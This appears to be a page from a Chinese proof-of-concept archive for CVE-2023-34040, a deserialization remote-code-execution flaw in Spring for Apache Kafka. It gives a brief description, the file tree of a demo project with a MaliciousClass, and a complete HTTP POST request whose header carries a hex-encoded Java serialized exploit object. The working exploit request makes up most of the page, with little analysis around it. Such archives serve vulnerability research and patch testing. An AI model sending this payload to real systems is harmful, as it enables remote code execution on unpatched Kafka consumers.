关联漏洞
标题:Spring Framework 代码问题漏洞 (CVE-2023-34040)Description:Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。 Spring Framework 存在安全漏洞,该漏洞源于存在反序列化漏洞,允许容器在配置了ErrorHandlingDeserializer的情况下反序列化标头。受影响的产品和版本:Spring for Apache Kafka 3.0.9及之前版本,2.9.10及之前版本。
介绍
# CVE-2023-34040
Spring Kafka Deserialization Remote Code Execution
```
POST /messages/send HTTP/1.1
Host: 127.0.0.1:8899
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6,so;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 2687
{"topic":"my-topic",
"record":"test",
"headers":{
"springDeserializerExceptionKey":"aced0005737200456f72672e737072696e676672616d65776f726b2e6b61666b612e737570706f72742e73657269616c697a65722e446573657269616c697a6174696f6e457863657074696f6e72e88c7ed34e438d0200025a000569734b65795b0004646174617400025b42787200286f72672e737072696e676672616d65776f726b2e6b61666b612e4b61666b61457863657074696f6e4337db8ec78a8e550200014c00086c6f674c6576656c7400304c6f72672f737072696e676672616d65776f726b2f6b61666b612f4b61666b61457863657074696f6e244c6576656c3b7872002f6f72672e737072696e676672616d65776f726b2e636f72652e4e657374656452756e74696d65457863657074696f6e4b7e7648cb8f9f000200007872001a6a6176612e6c616e672e52756e74696d65457863657074696f6e9e5f06470a3483e5020000787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b78707372002f636f6d2e6578616d706c652e537072696e674b61666b6144656d6f2e646174612e4d616c6963696f7573436c61737303246f394aa805ed0200007871007e000771007e000e707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007870000000017372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00094c000866696c654e616d6571007e00094c000a6d6574686f644e616d6571007e000978700000001074003e636f6d2e6578616d706c652e537072696e674b61666b6144656d6f2e646174612e47656e65726174654576696c53657269616c697a6174696f6e4461746174002247656e65726174654576696c53657269616c697a6174696f6e446174612e6a6176617400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000b7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e001b78740004746573747571007e000f000000017371007e00110000001071007e001371007e001471007e001571007e0019787e72002e6f72672e737072696e676672616d65776f726b2e6b61666b612e4b61666b61457863657074696f6e244c6576656c00000000000000001200007872000e6a6176612e6c616e672e456e756d000000000000000012000078707400054552524f5200757200025b42acf317f8060854e002000078700000000474657374"
}}
```
文件快照
[4.0K] /data/pocs/3d413ba0e17ce85b37c3fae655ec533932002b5e
├── [2.9K] pom.xml
├── [3.2K] README.md
├── [4.0K] src
│ ├── [4.0K] main
│ │ ├── [4.0K] java
│ │ │ └── [4.0K] com
│ │ │ └── [4.0K] example
│ │ │ └── [4.0K] SpringKafkaDemo
│ │ │ ├── [4.0K] config
│ │ │ │ ├── [2.1K] KafkaConsumerConfig.java
│ │ │ │ └── [1.3K] KafkaProducerConfig.java
│ │ │ ├── [4.0K] consumer
│ │ │ │ └── [ 567] KafkaConsumer.java
│ │ │ ├── [4.0K] data
│ │ │ │ └── [ 301] MaliciousClass.java
│ │ │ ├── [4.0K] model
│ │ │ │ └── [ 263] KafkaMessage.java
│ │ │ ├── [4.0K] producer
│ │ │ │ └── [1.9K] KafkaProducer.java
│ │ │ └── [ 349] SpringKafkaDemoApplication.java
│ │ └── [4.0K] resources
│ │ └── [ 510] application.yaml
│ └── [4.0K] test
│ └── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] SpringKafkaDemo
│ └── [ 237] SpringKafkaDemoApplicationTests.java
└── [4.0K] target
├── [4.0K] classes
│ ├── [ 510] application.yaml
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] SpringKafkaDemo
│ ├── [4.0K] config
│ │ ├── [3.0K] KafkaConsumerConfig.class
│ │ └── [2.0K] KafkaProducerConfig.class
│ ├── [4.0K] consumer
│ │ └── [1.1K] KafkaConsumer.class
│ ├── [4.0K] data
│ │ └── [ 753] MaliciousClass.class
│ ├── [4.0K] model
│ │ └── [1.3K] KafkaMessage.class
│ ├── [4.0K] producer
│ │ └── [3.6K] KafkaProducer.class
│ └── [ 788] SpringKafkaDemoApplication.class
├── [4.0K] maven-status
│ └── [4.0K] maven-compiler-plugin
│ └── [4.0K] compile
│ └── [4.0K] default-compile
│ └── [ 733] inputFiles.lst
└── [4.0K] test-classes
└── [4.0K] com
└── [4.0K] example
└── [4.0K] SpringKafkaDemo
└── [ 586] SpringKafkaDemoApplicationTests.class
35 directories, 21 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。